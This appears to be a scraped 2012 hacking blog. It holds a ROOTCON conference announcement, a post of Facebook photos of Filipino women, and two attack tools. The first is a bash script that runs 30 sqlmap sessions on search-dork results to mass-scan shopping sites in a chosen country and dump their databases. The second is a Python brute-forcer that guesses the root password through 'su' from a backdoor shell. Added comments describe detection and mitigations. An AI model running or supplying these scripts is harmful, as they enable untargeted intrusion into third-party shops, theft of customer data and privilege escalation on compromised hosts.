DEFCONPH was then renamed PinoyGreyHat, under which one conference was held before the founder finally decided to rebrand to a more neutral and conference-friendly name: ROOTCON. The name was officially changed on 09-August-2010.

With the same crew and team on board, ROOTCON is still the premier hacking conference in the Philippines. ROOTCON is open to everyone. Previous participants have included InfoSec personnel, developers, businessmen, students, lawyers, feds, and the like.

So what to expect from this con?

1. Awesome talks like Information Security, Web Application Attacks, Cyber Warfare, Cyber Crime, Lock picking, Vulnerability Discovery, Wireless Attacks, Reverse Engineering, Malware, Security Tools, Patch Management, Tools 101 (Metasploit, Nmap, etc.), and many more.

2. Cool activities like Hackista Challenge (CTF), Hacker Jeopardy, H4XØR BBQ, WiFi Shootout, WiFi Warrior (WiFi Cracking), beer drinking, and many more.

3. Meet new friends and old friends.

4. Receive ROOTCON swags and souvenirs.

5. /etc

So what do you need to do? Just get ready and be prepared for ROOTCON 6. Registration will open soon!

LINKS

Website: https://www.rootcon.org/

Blog: http://blog.rootcon.org/

Forum: http://forum.rootcon.org/

Activities: https://www.rootcon.org/xml/rootcon6/activities

Saturday, February 11, 2012

Sqlmap automatic scanner by wer0ckz

Here is a bash shell script written by wer0ckz, who is also one of the bloggers at The ProjectX Blog:

#!/bin/bash
# [*]
# [*] Sqlmap automatic scanner by wer0ckz
# [*] This tool is designed to scan sql injection by country specific together with shopping sites targets
# [*] It creates 30 screens with sqlmap running
# [*]
#
# Reviewer summary: prompts for a country code, unpacks sqlmap 0.9 into a
# directory named after it, and starts 30 detached `screen` sessions, one per
# combination of inurl:{shop,cart} x {cart,id,item,buy,product} x ext:{php,cfm,aspx}.
# The operator names no target: each session passes sqlmap a search query (-g)
# restricted to the chosen country suffix, so the sites probed are whatever the
# search results return.
#
# For site owners and responders: the pages affected are shop/cart URLs with
# parameters on country-code domains. None of the invocations below sets a
# User-Agent, so requests would normally carry sqlmap's self-identifying
# default string, which access logs and WAF rules can match. Parameterized
# queries on those endpoints remove the underlying exposure.
clear
echo -n “Enter country (ex. ca, au, ph): ”
read -e COUNTRY
# An existing directory with this name is treated as "already set up" and the
# script stops without doing anything else.
if [ -d $COUNTRY ]
then echo Country $COUNTRY is here. Exit!
else
echo “[*] Sqlmap mass scanner by wer0ckz”
echo “[*]”
echo “[*] Downloading Sqlmap..”
echo “[*]”
echo “[*]”
# The tarball is fetched over plain HTTP and unpacked with no checksum or
# signature check.
wget -nv http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz
tar zxf sqlmap-0.9.tar.gz
mv sqlmap $COUNTRY
rm ${COUNTRY}/lib/utils/google.py
echo “[*]”
echo “[*] Updating google scanner..”
# The bundled google.py is replaced by the copy from the project's SVN trunk,
# again without integrity verification.
wget -nv https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/utils/google.py
mv google.py ${COUNTRY}/lib/utils/google.py
# 30 detached sessions (screen -dm) follow; they keep running after this
# script returns. First 15: inurl:shop queries.
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop product” –dbs –batch
# Remaining 15: the same keyword/extension grid with inurl:cart.
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart product” –dbs –batch
echo “[*]”
echo “[*]”
echo “[*] Done! 30 sqlmap running”
echo “[*] Type ‘screen -r’ to check status”
fi

Saturday, February 4, 2012

Why I Love Pinays - Rediscovering The Beauty of Filipinas

I decided to upload the photos I saw in Facebook today which should definitely be the reason why I love Pinays or Filipinas.  Even if they are not famous or actresses they will surely blow up your mind ;) <Trust me>
Filipina

pinay beauties

Pilipina

binibini

louisian girls

babae

chinita

pinay model

beautiful pics

snob

pretty girls

yummy pinays

cute filipina

Friday, February 3, 2012

Local Root BruteForcer

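The Local Root BruteForce scanner works through a backconnect or backdoor shell. (It still needs a password list.) It spawns `su` once per word in the list, so each wrong guess is a separate failed `su` authentication that the host's authentication log will normally record.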


#!/usr/bin/python 
#Local Root BruteForcer 
 
 
#d3hydr8[at]gmail[dot]com 
 
import sys 
try: 
    import pexpect 
except(ImportError): 
    print "\nYou need the pexpect module." 
    print "http://www.noah.org/wiki/Pexpect\n" 
    sys.exit(1) 
 
#Change this if needed. 
# Text that brute() passes to pexpect's expect() as the "wrong password"
# pattern. It must match what the local `su` prints on failure.
# NOTE(review): the wording of that message presumably differs between
# systems and locales, which would be why the author flags it as adjustable.
LOGIN_ERROR = 'su: incorrect password' 
 
def brute(word): 
    """Try one candidate password against `su` and report it if a shell appears.

    word: the candidate password; the caller strips the trailing newline.

    Returns nothing. On a match the function prints the password and hands the
    terminal to the spawned shell with interact().

    Each call spawns a fresh `su` process, so every wrong guess is its own
    failed authentication. On most systems PAM/syslog records these, and a
    wordlist run shows up as a dense series of su failures from one account.
    Restricting who may run su (e.g. pam_wheel) and enforcing failure
    delay/lockout in PAM limit this technique.
    """
    print "Trying:",word 
    # No user argument is given, so su prompts for its default target account;
    # the hit message below labels that account as root.
    child = pexpect.spawn ('su') 
    child.expect ('Password: ') 
    child.sendline (word) 
    # expect() returns the index of whichever pattern matched first:
    # 0 = some text followed by a '#' surrounded by whitespace (presumably a
    #     root shell prompt), 1 = the LOGIN_ERROR string.
    # NOTE(review): no other outcome is handled here; pexpect raises on
    # timeout or EOF when neither pattern appears.
    i = child.expect (['.+\s#\s',LOGIN_ERROR]) 
    if i  == 0: 
        print "\n\t[!] Root Password:",word 
        # Run whoami in the new shell and print the output captured before the
        # last expect() match.
        child.sendline ('whoami') 
        print child.before 
        # Attach the user's terminal to the spawned shell.
        child.interact() 
    #if i == 1: 
        #print "Incorrect Password" 
 
# Command-line driver: expects exactly one argument, the path to a wordlist.
if len(sys.argv) != 2: 
    print "\nUsage : ./rootbrute.py <wordlist>" 
    print "Eg: ./rootbrute.py words.txt\n" 
    sys.exit(1) 
 
# The whole wordlist is read into memory, one entry per line. The file object
# is not closed explicitly.
try: 
    words = open(sys.argv[1], "r").readlines() 
except(IOError): 
      print "\nError: Check your wordlist path\n" 
      sys.exit(1) 
 
print "\n[+] Loaded:",len(words),"words" 
print "[+] BruteForcing...\n" 
# One brute() call, and so one `su` invocation, per wordlist line, run
# sequentially. Only the "\n" character is stripped from each entry.
for word in words: 
    brute(word.replace("\n",""))